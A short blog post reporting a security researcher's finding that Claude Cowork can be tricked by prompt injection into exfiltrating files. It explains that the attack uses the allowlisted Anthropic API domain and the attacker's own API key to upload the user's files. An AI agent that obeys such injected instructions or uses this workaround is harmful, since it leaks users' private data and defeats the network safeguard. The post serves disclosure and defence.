[go: up one dir, main page]

Simon Willison’s Weblog

Subscribe

Wednesday, 14th January 2026

Claude Cowork Exfiltrates Files (via) Claude Cowork defaults to allowing outbound HTTP traffic to only a specific list of domains, to help protect the user against prompt injection attacks that exfiltrate their data.

Prompt Armor found a creative workaround: Anthropic's API domain is on that list, so they constructed an attack that includes an attacker's own Anthropic API key and has the agent upload any files it can see to the https://api.anthropic.com/v1/files endpoint, allowing the attacker to retrieve their content later.

# 10:15 pm / security, ai, prompt-injection, generative-ai, llms, anthropic, exfiltration-attacks, ai-agents, claude-code, lethal-trifecta, claude-cowork

Tuesday, 13th January 2026
Thursday, 15th January 2026